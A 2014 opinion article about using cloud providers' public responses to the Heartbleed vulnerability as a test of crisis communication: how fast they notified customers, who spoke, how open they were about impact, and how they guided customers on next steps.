|By Ryan Barrett||
|May 3, 2014 02:00 PM EDT||
There are two pieces of good news to come out of Heartbleed. First, we haven't heard of any significant security breaches, which mean that the industry as a whole is getting better at fixing problems as they arise.
The second is that, because Heartbleed presented every single cloud provider with the exact same challenge, it created an excellent global litmus test for crisis response. Everyone started from the same baseline, which eliminates the variability in evaluating their response.
If you're a customer of the cloud, you can review any provider's public response to Heartbleed to evaluate both their technical dexterity (how long did it take them to issue a fix?) as well as their communications and customer service (did their communications assure you that you were in good hands?). And if you're a provider, you can see how your response compared to the competition - and, if necessary, make changes.
Below are a few key crisis response elements that you should look for.
In the event of a security crisis, it is critical that customers are notified as quickly as possible, and with as much pertinent information as is available. Most important, customers should know what is being done to protect them. Timing is everything. Did the company you're evaluating have a public response on their blog? On Twitter? Via email? And how quickly did they start communicating?
The communication does not necessarily have to include a comprehensive action plan. But it must be enough to assure you that the service provider is aware of the issue and actively working on a solution.
Who Is Doing the Communication?
After a major security breach, it is important that customers know that the service provider is taking the matter very seriously. Therefore, customer communication should be attributed to a C-level executive within the company. For something as significant as Heartbleed, you want to hear from the company's security or operations executives.
Transparency About Impact and Potential Risks
If a company has been impacted, they should be open and up-front about it. They should clearly articulate which services have - and have not - been affected. It should be easy to assess the impact on users, how long they've been exposed to the risk, and what action the company has taken (e.g., systems patched/certificates reissued).
Responsible Disclosure Policies
It's just as important for a company to disclose what they don't know as it is to disclose what they do know. For instance, could there have been hackers who may have accessed user data? Users would want to know where the company stands on the patch management programs and if there is a tool to check if a service/product/site is still vulnerable.
Sharing of Best Practices
After the initial communication has been delivered, customers will need clarity around what next steps should be taken. IT teams will want to know if immediate upgrades are needed; users will want to know if it's time to change passwords. It is important that customers know where to go for answers to potential questions - whether it's the company's blog, an online forum, or a support phone number. Put yourself in the shoes of a customer: if you still had questions, would it be clear from the provider's communications what you should do next?
Heartbleed may soon be history, but there will inevitably be another crisis. You should use the trail of communications left behind by Heartbleed as a litmus test for crisis response. If you're a customer, make sure that all your providers delivered the level of communications you needed to feel comfortable. If you're a provider, make sure that customer communications is as much a part of your crisis response processes as is your technical work.
Jun. 29, 2016 07:00 PM EDT Reads: 476
Jun. 29, 2016 05:30 PM EDT Reads: 1,045
Jun. 29, 2016 04:15 PM EDT Reads: 460
Jun. 29, 2016 04:15 PM EDT Reads: 431
Jun. 29, 2016 04:00 PM EDT Reads: 397
Jun. 29, 2016 03:02 PM EDT Reads: 298
Jun. 29, 2016 03:00 PM EDT Reads: 388
Jun. 29, 2016 02:00 PM EDT Reads: 414
Jun. 29, 2016 02:00 PM EDT Reads: 672
Jun. 29, 2016 01:15 PM EDT Reads: 379
Jun. 29, 2016 12:30 PM EDT Reads: 567
Jun. 29, 2016 11:00 AM EDT Reads: 538
Jun. 29, 2016 11:00 AM EDT Reads: 505
Jun. 29, 2016 11:00 AM EDT Reads: 606
Jun. 29, 2016 10:45 AM EDT Reads: 573
Jun. 29, 2016 10:30 AM EDT Reads: 525
Jun. 29, 2016 10:00 AM EDT Reads: 1,307
Jun. 29, 2016 09:45 AM EDT Reads: 1,279
Jun. 29, 2016 09:45 AM EDT Reads: 961
Jun. 29, 2016 09:15 AM EDT Reads: 1,469